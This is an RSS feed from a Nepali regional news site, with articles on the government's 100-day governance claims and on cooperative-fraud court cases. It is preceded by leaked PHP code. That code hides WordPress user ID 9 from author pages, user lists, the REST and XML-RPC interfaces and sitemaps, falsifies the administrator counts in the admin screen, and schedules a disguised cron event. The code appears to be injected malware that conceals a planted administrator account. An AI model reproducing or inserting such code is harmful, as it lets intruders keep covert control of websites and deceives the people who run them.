add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
सहकारी – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceSat, 04 Jul 2026 16:43:41 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgसहकारी – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232मुलुकमा भ्रष्टाचार नियन्त्रण, सार्वजनिक सेवा सुधार र सुशासनमा १३ उपलब्धि सरकारद्वारा सार्वजनिक
https://www.antaranganews.com/?p=49869
https://www.antaranganews.com/?p=49869#respondSat, 04 Jul 2026 14:34:03 +0000https://www.antaranganews.com/?p=49869काठमाडौँ– राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)का वरिष्ठ नेता प्रधानमन्त्री बालेन्द्र शाह (बालेन)को नेतृत्वमा वर्तमान सरकार गठन भएको एक सय दिन पूरा भएको छ । सो अवसरमा सरकारले सो अवधिमा भएका आफ्ना मुख्यमुख्य उपलब्धि असार २० गते सार्वजनिक गरेको हो । जसमा भ्रष्टाचार नियन्त्रण, सार्वजनिक सेवा सुधार र सुशासनमा सरकारका १३ उपलब्धि भएको बुँदागत रुपमा उल्लेख छ ।
चैत १३ गतेको मन्त्रिपरिषद्को पहिलो बैठकबाट स्वीकृत ‘शासकीय सुधारका एक सय कार्यसूची’ लाई आधार मानी सरकारले प्रशासनिक सुधार र नागरिक सेवा प्रवाहमा महत्त्वपूर्ण फड्को मारेको दाबी गरेको छ । बालेन शाह नेतृत्वको सरकार गत चैत १३ गते गठन भएको थियो । सरकारले प्रस्तुत गरेको सुशासनका पक्षका १३ बुँदाहरू ः १. उच्चस्तरीय सम्पत्ति छानबिन आयोग गठन :
देशमा व्याप्त भ्रष्टाचार र दण्डहीनता अन्त्य गर्न २०६२÷६३ देखि २०८२÷८३ सम्म सार्वजनिक पद धारण गरेका राजनीतिक पदाधिकारी र उच्चपदस्थ कर्मचारीहरूको सम्पत्ति छानबिन गर्न ‘सम्पत्ति छानबिन आयोग’ गठन गरिएको छ । अवैध रूपमा आर्जित सम्पत्ति भेटिएमा प्रचलित कानुनबमोजिम कारबाहीको सिफारिस गर्ने कार्यादेश आयोगलाई दिइएको छ । २. सम्पत्ति शुद्धीकरणमा उपलब्धि :
सम्पत्ति शुद्धीकरण अनुसन्धान विभागमार्फत नीतिगत सेटिङमा संलग्न व्यक्तिहरूलाई कानुनी दायरामा ल्याइएको छ । यस अवधिमा ७ वटा ठूला मुद्दा दायर गरी १०१ जनालाई प्रतिवादी बनाउँदै १११ अर्ब रुपैयाँको बिगो दाबी गरिएको छ । ३. सार्वजनिक खर्चमा कटौती र मितव्ययिता :
सरकारले प्रशासनिक भार कम गर्न ३१ वटा अनावश्यक सरकारी निकायहरू खारेज गरेको छ भने ६ वटा निकायलाई गाभिएको छ । साथै, मन्त्रालयहरूको संख्या २२ बाट घटाएर १८ मा झारिएको छ । यसबाट वार्षिक अर्बौँ रुपैयाँ बचत हुने आंकलन गरिएको छ । ४. विलासी सुविधा र सवारी साधन फिर्ता :
नियमविपरीत सरकारी सवारी साधन प्रयोग गर्ने पूर्वपदाधिकारी र पहुँचवालाहरूबाट ६७२ वटा सरकारी गाडी र मोटरसाइकल जफत गरी फिर्ता ल्याइएको छ । सवारी सुविधा नपाउने पदाधिकारीहरूको इन्धन र मर्मत खर्चमा समेत भारी कटौती गरिएको छ । ५. दलीय ट्रेड युनियनको खारेजी :
सार्वजनिक निकायहरूमा हुने राजनीतिकरण अन्त्य गर्न विभिन्न दलीय ट्रेड युनियनहरूलाई अध्यादेशमार्फत खारेज गरिएको छ । यसबाट कर्मचारीहरूलाई आफ्नो काम र कर्तव्यप्रति थप जिम्मेवार र उत्तरदायी बनाउने लक्ष्य राखिएको छ । ६. राजनीतिक भागबण्डा अन्त्य, योग्यताका आधारमा नियुक्ति :
विभिन्न मन्त्रालय, बोर्ड र आयोजनाहरूमा हुँदै आएको राजनीतिक भागबण्डा र ‘सेटिङ’लाई अन्त्य गरिएको छ । राष्ट्रिय योजना आयोग, विभिन्न विश्वविद्यालयका उपकुलपति र राजदूत पदहरूमा पहिलो पटक खुला प्रतिस्पर्धा र योग्यताका आधारमा नियुक्ति गर्ने प्रक्रिया सुरु गरिएको छ । ७. नागरिकको घरदैलोमै सेवा :
राहदानी र नागरिकता लगायतका सार्वजनिक सेवालाई नागरिकको घरदैलोमै पु¥याउन हुलाक कार्यालयमार्फत ७५ जिल्लामा सेवा विस्तार गरिएको छ । कास्की र मोरङमा सवारी चालक अनुमति पत्र (लाइसेन्स) घरमै पुर्याउने कार्यको सुरुवात गरिएको छ । ८. डिजिटल शासनको विस्तार :
सरकारी सेवालाई बिचौलियामुक्त बनाउन डिजिटल प्रणालीमा जोड दिइएको छ । अनलाइनमार्फत नागरिकता सिफारिस, राहदानी प्रिरोइन्मेन्ट र इमिग्रेसनको स्वघोषणा जस्ता सेवाहरू सुरु भएका छन् । नागरिक एपमार्फत इन्जिनियरिङ काउन्सिलको प्रमाणपत्र र प्रहरी चारित्रिक प्रमाणपत्र डाउनलोड गर्न मिल्ने व्यवस्था मिलाइएको छ । ९. सरकारी र सार्वजनिक जग्गाको संरक्षण :
अतिक्रमित सरकारी जग्गा फिर्ता ल्याउन ‘रावल आयोग’ को प्रतिवेदन कार्यान्वयनमा ल्याइएको छ । बाल मन्दिर, फेवाताल क्षेत्र र बागमती किनारका जोखिमयुक्त बस्तीहरू हटाई सार्वजनिक जग्गा संरक्षण र पार्क विकासको काम अघि बढाइएको छ । १०. ‘हेलो सरकार’ को स्तरोन्नति :
नागरिकका गुनासा सिधै सुन्न ‘हेलो सरकार’लाई नागरिक संवादको प्लेटफर्मका रूपमा विकास गरिएको छ । पछिल्लो १०० दिनमा प्राप्त गुनासाहरू मध्ये ६० प्रतिशत फस्र्योट भइसकेको र यसले सरकारप्रति नागरिकको भरोसा बढाएको भनिएको छ । ११. रुग्ण आयोजनाहरूको सूक्ष्म अध्ययन र व्यवस्थापन :
लामो समयदेखि अलपत्र परेका ५७८ वटा ठेक्काहरूको विस्तृत अध्ययन गरी समस्या समाधानका लागि प्रतिवेदन तयार पारिएको छ । काम नगर्ने १५ वटा ठेक्का तोडिएको छ भने ढिलाइ गर्ने ठेकेदारहरूलाई कानुनी दायरामा ल्याइएको छ । १२. सहकारी ठगी नियन्त्रण र बचत फिर्ता :
समस्याग्रस्त १० वटा सहकारीका १७५० साना बचतकर्ताहरूको करिब २ करोड ६३ लाख रुपैयाँ बचत फिर्ता गरिएको छ । सहकारी बेथितिबारे छानबिन गर्न आयोग गठन गरी दोषीहरूमाथि कारबाही प्रक्रिया अघि बढाइएको छ । १३. प्रधानमन्त्री कार्यसम्पादन एकाइ स्थापना :
देशको लगानी, उत्पादन र विकासलाई परिणाममुखी बनाउन प्रधानमन्त्री तथा मन्त्रिपरिषद्को कार्यालय अन्तर्गत ‘प्रधानमन्त्री कार्यसम्पादन एकाइ’ स्थापना गरिएको छ । यसले राष्ट्रिय गौरवका आयोजना र रणनीतिक कार्यहरूको प्रत्यक्ष अनुगमन गर्नेछ ।
सरकारले यी उपलब्धिहरूलाई सुशासनको प्रारम्भिक संकेतको रूपमा लिँदै आगामी दिनमा शासकीय सुधारका कार्यहरूलाई थप तीव्रताका साथ अघि बढाउने प्रतिबद्धता व्यक्त गरेको जनाएको छ ।
]]>
https://www.antaranganews.com/?feed=rss2&p=498690रास्वपा सभापति रवि लामिछाने विरूद्धको संगठित अपराधको कसुर काठमाडौं जिल्ला अदालतले पनि फिर्ता गर्यो
https://www.antaranganews.com/?p=49485
https://www.antaranganews.com/?p=49485#respondSat, 20 Jun 2026 00:53:37 +0000https://www.antaranganews.com/?p=49485काठमाडौं– काठमाडौं जिल्ला अदालतले रास्वपा सभापति रवि लामिछानेविरुद्ध लगाइएको सङ्गठित अपराधसम्बन्धी अभियोग फिर्ता लिन अनुमति दिएको छ । स्वर्णलक्ष्मी सहकारी ठगीको कसुरमा जोडिएको संगठित अपराध कसुरलाई फिर्ता गर्ने आदेश दिएको हो । मुलुकी फौजदारी कार्यविधि संहिता, २०७४ को दफा ३६ बमोजिम सभापति रविसहितका प्रतिवादीमाथिको सङ्गठित अपराधको अभियोग हटाउन असार ५ गते आदेश दिएको हो ।
जिल्ला न्यायाधीश आत्मदेव जोशीको इजलासले सो आदेश दिएको हो । अभियोग संशोधन गर्दा इजलासले पीडितलाई क्षतिपूर्ति हुने कुरालाई आधार मानेको छ । यसरी अदालतले अभिभावकीय दायित्व निर्वाह गरी मुद्दा संशोधन गरेको आदेशमा उल्लेख छ । यसअघि सभापति रविविरूद्ध कास्की जिल्ला अदालत, पर्सा जिल्ला अदालतबाट पनि सम्पत्ति शुद्धीकरण र संगठित अपराधको कसुर फिर्ता भएको छ ।
आदेशमा भनिएको छ, ‘…ऐन समेतले पीडितमुखी न्यायको अवधारणालाई स्वीकार गरेको परिप्रेक्ष्यमा पीडितलाई क्षतिपूर्ति सहितको न्यायका लागि बाधकका रूपमा रहने लामो फौजदारी प्रक्रिया, कठोर अभियोग एवं मिलापत्रका लागि अवरोध हुने अवस्थामा फौजदारी न्यायशास्त्र, अभियोजनको स्वायत्तता, पीडितको अधिकार र सार्वजनिक हितबिचको सन्तुलनका लागि अदालतले अभिभावकीय दायित्व निर्वाह गर्नुपर्ने पनि हुन्छ ।’
कालीमाटीको स्वर्णलक्ष्मी बहुउद्देश्यीय सहकारी संस्थामा बचतकर्ताले राखेको रकम अनियमितता भएको प्रकरणमा रविसहित ३९ जनाविरुद्ध मुद्दा दर्ता भएको थियो । स्वर्णलक्ष्मी सहकारीको एक अर्ब १९ करोड ९५ लाख रुपैयाँ अनियमितता गरेको अभियोग उनीहरूविरुद्ध थियो ।
सुमन खनाल लगायतको जाहेरीका आधारमा नेपाल सरकार वादी रहेको लामिछानेसहितका प्रतिवादीको सहकारी ठगी तथा संगठित अपराधसम्बन्धी मुद्दामा तत्कालीन महान्यायाधिवक्ता सविता भण्डारी बरालको निर्णय अनुरुप जिल्ला सरकारी वकिलको कार्यालय काठमाडौंले अभियोग पत्र संशोधनको निवेदन दिएको थियो ।
लामिछाने समेत ३९ प्रतिवादीविरुद्ध ठगी र संगठित अपराध गरेको दाबीसहित २०८१ पुस २१ मा सुरु अभियोगपत्र दर्ता भएको थियो । त्यसपछि दोस्रोपल्ट २०८२ वैशाख ३० मा अर्को पूरक अभियोगपत्र पेस भएको थियो ।
अपराध संहिता, फौजदारी कार्यविधि संहिता एवं अपराधपीडित संरक्षण ऐन समेतले पीडितमुखी न्यायको अवधारणालाई स्वीकार गरेको परिप्रेक्ष्यलाई इजलासले दृष्टिगत गरेको काठमाडौं जिल्ला अदालतका सूचना अधिकारी शिव खतिवडाले बताउनु भयो । उहाँका अनुसार सरकारी वकिलको कार्यालय काठमाडौंले अभियोग संशोधनका लागि अदालतमा निवेदन दिएपछि ५ गते उक्त पेसी चढेको हो ।
]]>https://www.antaranganews.com/?feed=rss2&p=494850सुनौलो भविष्य सहकारी ठगी काण्ड : उपाध्यक्ष घिमिरे छ लाख भुस्याउँदै आठ लाख धरौटीमा रिहा
https://www.antaranganews.com/?p=37727
https://www.antaranganews.com/?p=37727#respondMon, 05 Jan 2026 02:57:09 +0000https://www.antaranganews.com/?p=37727बेसीशहर– लमजुङको जिल्ला सदरमुकाम स्थित बेसीशहर नगरपालिका– ७ को मनाङे चौतारामा मुख्य कार्यालय रहेको सुनौलो भविष्य सहकारी संस्था लि.को ठगी मुद्दामा प्रमुख अभियुक्त रहेका सो संस्थाका उपाध्यक्ष अरुणकान्त घिमिरे आठ लाख रुपैयाँ धरौटीमा रिहा भएका छन् । लमजुङ जिल्ला अदालतले उनलाई पुस २० गते त्यस्तो आदेश दिएको हो ।
प्रहरीकोमा छ लाख रुपैयाँ अनुसन्धान धरौटी राखेर रिहा हुने सुविधा पाएको घिमिरेले जिल्ला अदालतमा मुद्दा बुझाउँदाको दिनमा अनुपस्थित भएपछि उनले सो क्रममा प्रहरीमा राखेको छ लाख रुपैयाँ भूस भएको प्रहरी स्रोतले जनाएको छ । त्यसो त सो दिनमा अनुपस्थित हुने सबैको धरौटी ल्याप्स हुने कानुनी व्यवस्था रहेको बताइन्छ । सोही आधारमा घिमिरेको छ लाख भूसमा परिणत भएको हो ।
सो सहकारीको आन्तरिक लेखा परीक्षणबाट उपाध्यक्ष घिमिरेको जिम्ममा ४१ लाख रुपैयाँ रहेको देखिएको सो सहकारीका अन्य सञ्चालकहरूले बताएका छन् । त्यो रकम तिर्नका लागि सकार गरे पनि घिमिरेले पैसा दिन भने आलटाल गरिरहेको उनीहरूको भनाइ छ । यसरी आफू पटक– पटक जिम्मेवार पदमा रहेका घिमिरे सञ्चालक रहेको सहकारीका विरुद्धमा ठगी आरोपको मुद्दा चलिरहदा उनी भने चिनको सयरका तल्लिन रहेको भन्दै आफूहरूले आक्रोश पोखेपछि उनलाई प्रहरीले पक्रन बाध्य भएको पीडितहरू बताउँछन् ।
घिमिरे बेसीशहर नगरपालिका– ३ को मूलपानी गाउँमा घर भएका नेपाली काँग्रेसका जिल्ला उपसभापति श्रीकान्त घिमिरेका छोरा हुन् । श्रीकान्त घिमिरे पनि यसअघि लमजुङ विद्युत उपभोक्ता संस्था डुवाउने नायकका रुपमा परिचित छन् ।
श्रीकान्तका सुपुत्र अरुणकान्त घिमिरे सुनौलो भविष्य सहकारीको २०६९ मंसिरमा भएको पहिलो अधिवेशनबाट निर्वाचित कार्यकारी सदस्य, २०७१ मा कोषाध्यक्ष तथा लेखा समितिको संयोजक, २०७४ मा सचिव, २०७७ तथा ०७८ को पुस महिनादेखि हालसम्म उपाध्यक्ष रहेको सो संस्थाको रेकर्डमा उल्लेख छ ।
त्यसरी प्रहरीमा राखेको धरौटी भुस्याउनेमा भक्ति नमूना माविका प्रावि शिक्षक थकित यात्री समेत रहेको स्रोतले जनाएको छ ।
उक्त मुद्दामा कुल विगो करिब छ करोड ८५ लाख दावी गरिएको अभियोगल पत्रमा उल्लेख छ । तर पक्राउ परेका सञ्चालक समितिका अध्यक्ष समेत रहेका व्यक्तिहरूले भने लाख धरौटीमा रिहा हुने अवसर पाएका छन् ।
जिल्ला अदालतको आदेशले सबैभन्दा बढी धरौटी तिर्नेमा समेत अरुणकान्त घिमिरे दरिएका छन् । यसअघि सबैभन्दा बढी ७ लाख रुपैयाँ धरौटी राख्नेमा सो सहकारीमा प्रवन्धक रहेर पछि अध्यक्ष समेत भएका पदम रावललाई जिल्ला अदालतले आदेश दिएको छ । जब की उनलाई वर्तमान सञ्चालक समितिका अध्यक्ष ऋषि अधिकारीबाट झण्डै चार करोड तिर्नु पर्ने देखिएको हुँदा सो रकम सहकारीमा बुझाउनु होला भन्दै पत्र लेख्ने काम समेत भएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=377270सुनौलो भविष्य सहकारी ठगीमा एक वडाध्यक्षसमेतमा सात जना छुटे जनही लाख धरौटीमा
https://www.antaranganews.com/?p=37504
https://www.antaranganews.com/?p=37504#respondSun, 28 Dec 2025 16:57:09 +0000https://www.antaranganews.com/?p=37504बेसीशहर– लमजुङको जिल्ला सदरमुकाम स्थित बेसीशहर नगरपालिका– ८ मा मुख्य कार्यालय रहेको सुनौलो भविष्य सहकारी संस्था लि.को ठगी मुद्दाका अभियुक्त रहेका वडाध्यक्ष समेतका सात जना एक एक लाख धरौटीमा छुटेका छन् । जिल्ला अदालतमा दर्ता भएको सो मुद्दाको थुनछेक बहस पछि उनीहरू पुस १३ गते धरौटीमा रिहा भएका हुन् ।
सो मुद्दामा जम्मा २११ जनालाई मात्र प्रतिवादी बनाइएको भएता पनि आज रिहा हुनेको संख्या सात मात्र रहेको छ । उक्त मुद्दामा कुल विगो करिब छ करोड ८५ लाख दावी गरिएको अभियोगल पत्रमा उल्लेख छ । तर पक्राउ परेका सञ्चालक समितिका अध्यक्ष समेत रहेका व्यक्तिहरूले भने लाख धरौटीमा रिहा हुने अवसर पाएका छन् । सबैभन्दा बढी सो सहकारीमा प्रवन्धक रहेर पछि अध्यक्ष समेत भएका पदम रावललाई सात लाख धरौटी माग गरिएको छ । जब की उनलाई वर्तमान सञ्चालक समितिका अध्यक्ष ऋषि अधिकारीले झण्डै चार करोड तिर्नु पर्ने देखिएको हुँदा सो रकम सहकारीमा बुझाउनु होला भन्दै पत्र लेख्ने कामसमेत गरेको करिब दुई वर्ष वितिसकेको छ ।
त्यसपछि चार महिनामात्र अध्यक्ष भई बुझाएको बताउनु कावा अध्यक्षसँग दुई खाल धारौटी माग भएको छ । अर्का अध्यक्ष हरिप्रसाद पौडेलसँग एकलाख धारौटी माग्ने काम जिल्ला अदालतबाट भएको छ । मलाई करैबल सदस्य राखिदिएका हुन् र बैठक हुदा पनि घरमा माइनुट ल्याएर सही गराउथे भन्ने व्यक्तिलाई समेत एक लाख धरौटी माग गर्ने काम भएको छ ।
त्यस्तै, यसअघि जिल्ला प्रहरी कार्यालयमा ५० हजार धरौटी राखेर उन्मुक्ति पाएको बेसीशहर नगरपालिका– ११ का वडाध्यक्ष शिवप्रसाद जोशीले थप ५० हजार धारौटी राख्नु पर्ने भएको छ । यसप्रकार एक लाख धरौटीमा निस्कनेहरूमा लेखमान खवास श्रेष्ठ राना र ऋषिराज दवाडी छन् ।
सो मुद्दा जिल्ला अदालतमा न्यायाधीश नभएको मौकामा दर्ता गरिएको हो । कानुन अनुसार गत कार्तिक २१ गते नै बुझाउने पर्ने अन्तिम म्याद रहेकोमा सो मुद्दा जिल्ला सरकारी वकिल कृष्ण पाण्डेले रमाना पत्र तयार गरी सो पत्र बुझ्नु अघि मात्र दर्ता गराउनुलाई आश्चर्यका रुपमा हेरिएको छ ।
पाण्डेले रमाना लिने दिन पुस ९ गते उक्त सहकारीका विभिन्न समयमा सञ्चालक रहेका ५३ जनामध्ये ४७ जनाउपर संगठित अपराध मुद्दा समेत लगाइएको छ । अन्य प्रतिवादीहरू सो सहकारीका ऋणीहरू रहेको बताइएको छ । यसअघि प्रहरीले कानुनी अधिकार विपरित उनीहरूसहित १४ जनालाई अनुसन्धानको क्रममा धरौटी लिएर छाडेको थियो ।
सो मुद्दामा मुछिएका अन्य सबै फरार रहेको र उनीहरूको खोजी कार्य जारी रहेको प्रहरी भनाइ छ । फरार हुनेमा यसअघि धरौटीमा छुट्नेहरूमा सो सहकारीमा हाल र लामो समयसम्म लेखा संयोजक रहेका भक्ति नमूना माविको प्रावि तहका शिक्षक थकित यात्रीसमेत रहेको प्रहरी भनाइ छ ।
स्मरणीय छ, उक्त ठगी मुद्दामा प्रतिवादी बनाइएका १५८ जना ऋणीहरू हुन् । उनीहरूका विरुद्धमा लेनदेन मुद्दा चलाउनु पर्नेमा सो नगरी सहकारी ठगीको मुद्दा चलाउनुमा पनि राजनीतिक एवम् आर्थिक चलखेलले काम गरेको भन्ने अडकल रहेको छ ।
स्मरणीय छ, यस जिल्लामा शेयर सदस्यहरूलाई ठगेर केही सहकारी संस्था बन्द भएपछि मुद्दा खेप्नेमा दुई सहकारीका सञ्चालक मात्र छन् । जसमा सुनौलो भविष्य सहकारी संस्था दोस्रो हो । त्यसको कर्मचारीका विरुद्धमा पनि दुई सहकारीले मुद्दा चलाएका छन् । एउटाको मुद्दा सर्वोच्च पुगेको छ भने अर्को मुद्दा जिल्ला अदालतमै विचाराधिन छ ।
यसअघि बेसीशहरमै रहेको कालिका साकोसको सहकारी ठगी काण्डमा त्यसका सञ्चालकहरूका विरुद्धमा पीडितहरूले सहकारी ठगी मुद्दा दर्ता गरेका थिए । तर त्यो ‘खोदा पहाड निक्ला चुहा’का रुपमा झिसमिस गरियो । त्यसरी झिसमिस बनाउने कार्यमा भूमिका खेल्नेमा यस जिल्लाका निवर्तमान सरकारी वकिल पाण्डेले राम्रो नायकत्वको निभाएको भन्ने पीडितहरूको गुनासो छ ।
ती वकिल पाण्डेले सहकारीलाई ‘बैंक ग्यारेन्टी’ दिने अधिकार नभएको जान्दा जान्दै र त्यो पनि सोही मुद्दा लागेको कालिका सहकारीले आफ्नो लेटर हेडको चिर्कटोमा ‘हामीसँग पैसा छ’ अर्थात भनेको पत्रलाई नै बैंक ग्यारेन्टीको आधार मानेर सो मुद्दा मिलापत्र गराउने काम गरेर मोटो रकम कुम्ल्याएका थिए भन्ने स्रोतको दावी छ । अन्यथा कानुन विपरितको काम कोही गर्छ ? स्रोतको प्रति प्रश्न छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=375040लमजुङको सुनौलो भविष्य सहकारी ठगीका अभियुक्त बेसीशहर– ११ का वडाध्यक्ष रहेका शिव जोशीसमेत सात जना फेरि परे प्रहरी कष्टडीमा
https://www.antaranganews.com/?p=37417
https://www.antaranganews.com/?p=37417#respondWed, 24 Dec 2025 16:55:30 +0000https://www.antaranganews.com/?p=37417बेसीशहर– लमजुङको जिल्ला सदरमुकाम बेसीशहर नगरपालिका– ८ को मनाङ्गे चौतारमा मुख्य कार्यालय रहेको मुलुकमै सहकारी ठगीको सबैभन्दा बढी अभियुक्त मुछिएको सहकारी ठगी मुद्दाका अभियुक्त सात जना फेरि प्रहरी कष्टडीमा परेका छन् । सरकारी वकिल कृष्णचन्द्र पाण्डेले जिल्ला अदालतमा न्यायाधीश नभएता पनि आफ्नो रमाना पत्र तयार गरेर सरुवा भएको जिल्लामा हिड्नका लागि लगेज बाधी सकेपछि उनीहरू विरुद्धको मुद्दा जिल्ला अदालतमा दर्ता गरेसँगै ती सात जना पुस ९ गते प्रहरी कष्टडीमा पुगेका हुन् ।
यो जिल्लाका सहकारी ठगीका नाउँमा चलाइएका मुद्दाहरूमा ‘कहिँ नभएको जात्रा हाडी गाउँ’मा भने जस्तो व्यहारतः हुँदै, गरिदै र देखिदै आएको छ । यसअघिको बहुचर्चिक कालिका सहकारीको ठगी काण्डमासमेत मोटो रकमको चलखेल भएको सुनिदै आएको हो ।
सरकारी वकिल पाण्डेले बार्गेनिङ गरेको रकम (अचानक सरुवा भएका कारण) बुझ्न नपाएपछि सो मुद्दा दर्ता गरिएको बुझिन आएको छ । अन्यथा, गत कार्तिक २१ गते नै बुझाउने पर्ने अन्तिम म्याद रहेको यो मुद्दा हिजोका दिनसम्म पर्खेर आजै बुझाउनुको कारण पाण्डेले कबोल अनुसारको रकम नपाएको झोकमा मुद्दा दर्ता गराएका हुन् भन्ने स्रोतको दावी अनुसारको हल्लाले बेसीशहर बजार गर्माएको छ ।
आज प्रहरी कष्टडीमा जानेमा उक्त सहकारीका सञ्चालक समितिका संस्थापक अध्यक्ष एवम् प्रवन्धक रहेका हाल : बेसीशहर नगरपालिका– ११ का वडाध्यक्ष शिवराज जोशी, सो सहकारीका पूर्वअध्यक्ष एवम् प्रवन्धक पदम राउत, पूर्वअध्यक्ष हरिप्रसाद पौडेल, ऋषि दवाडी, लेखमान खवास लागयत रहेका छन् ।
सो मुद्दामा जम्मा २११ जनालाई मात्र प्रतिवादी बनाउने काम भएको छ । तीमध्ये उक्त सहकारीका विभिन्न समयमा सञ्चालक रहेका ५३ जना र अन्य सो सहकारीका ऋणीहरू रहेको बुझिएको छ । यसअघि प्रहरीले उनीहरूसहित १४ जनालाई अनुसन्धानको क्रममा धरौटीमा छाडेको थियो । यसअघि धरौटीमा छुट्नेहरूमा सो सहकारीमा लामो समयसम्म लेखा संयोजक रहेका भक्ति नमूना माविको प्रावि तहका शिक्षक थकित यात्रीसमेत रहेको र यतिबेला भने उनी फरार रहेको प्रहरी भनाइ छ । ५३ जना सञ्चालकमध्ये ४७ जनालाई संगठित अवराध मुद्दा लगाइएको बुझिएको छ ।
भोलि सरकारी विदा छ, पर्सी शुक्रबार भएको र जिल्ला न्यायाधीश बिदामा भएको हुँदा उहाँ पुस १३ गते मात्र कार्यालयमा हाजिर हुन आउनु हुने भएको बुझिन आएको छ । त्यसैकारण पुस १३ गतेका दिनमा मात्र आज प्रहरी कष्टडीमा जानेहरूको बयान हुनेछ । त्यसै कारणले यसअघि एकै दिन आएर बयान र धरौटी बुझाएर रिहाईको सुविधा लिनु भएका वडाध्यक्ष जोशी यसपटक भने कम्तिमा पाँच रात कष्टडीमा बताउनु पर्ने स्थिति उत्पन्न भएको स्रोतले बताएको छ ।
उक्त मुद्दाका लागि कुल विगो करिब ६ करोड ८५ लाख दावी गरिएको छ भने उनी(सञ्चालक)हरू सबैका विरुद्ध संगठीत अपराध मुद्दा पनि लगाइएको छ । यसअघि सम्पत्ती शुद्धिकरणको समेत मुद्दा लगाउने भनिएकोमा त्यो भने अभियोग पत्रमा उल्लेख नभएको स्रोतले बताएको छ ।
स्मरणीय छ, यसअघि बेसीशहरमै रहेको कालिका साकोसको सहकारी काण्ड(ठगी मुद्दा)लाई ‘खोदा पहाड निक्ला चुहा’ बनाउनमा भूमिका खेल्नेमा सरकारी वकिल पाण्डेले राम्रो नायकत्वको निभाएको आम बुझाइ छ । जुन मुद्दाको कथित मिलापत्र गराउने कार्य गर्ने क्रममा सरकारी वकिल पाण्डेले एक अभियुक्तलाई अदालतले पूर्जी काटिसकेपछि पनि उनी हाजिर नहुदाको अवस्थामा पनि त्यस्तो व्यक्तिको मुद्दासमेत फिर्ता लिएर तारतम्य मिलाएका थिए । त्यस्तै, अर्का एक व्यक्ति अदालतमा अनुपस्थित रहदा रहदै उनको इच्छापत्र विना श्रीमतीलाई सही गरेर पनि मिलापत्र गर्न हुन्छ भन्ने जिद्दी कस्दै मिलापत्र गराउने काम गरेका थिए । त्यतिमात्र हैन पाण्डेले सम्पत्ती शुद्धिकरणको मुद्दा चलेको अवस्थामा मुद्दा मिलापत्र गराएको समेत बुझिन आएको छ । अझ आश्चर्य त के छ भने, ती पाण्डेले सहकारीलाई ‘बैंक ग्यारेन्टी’ दिने अधिकार छैन भन्ने जान्दा जान्दै र त्यो पनि सोही मुद्दा लागेको कालिका सहकारीले आफ्नो लेटर हेडमा ‘हामीसँग पैसा छ’ भनेको पत्रलाई नै ‘बैंक ग्यारेन्टी’को आधार मानेर सो मुद्दा मिलापत्र गराएका थिए । यसबाट सरकारी वकिल पाण्डेले बिना पैसा त्यो काम गर्ने गराउने गरेका हुन् भन्ने सहाकारी अभियानको ‘स’सम्मको पनि जानकारहरू व्यक्तिहरू कसैले पत्याइरहेको अवस्था छैन । यसरी नाम कमाएका उनै पाण्डेले आजकै दिन सुनौलो भविष्य सहकारीका सातजनालाई पुसको ठण्डीको यस्तो चिसो रातमा प्रहरी कष्टडीमा पुर्याउने काम गरेर रमाना लिइ हिडेको बेसीशहरका चोक, चियापसल लगायत मानिस जमघट हुने सर्वत्र स्थानमा सोही बिषयले विशेष चर्चा पाइरहेको छ ।
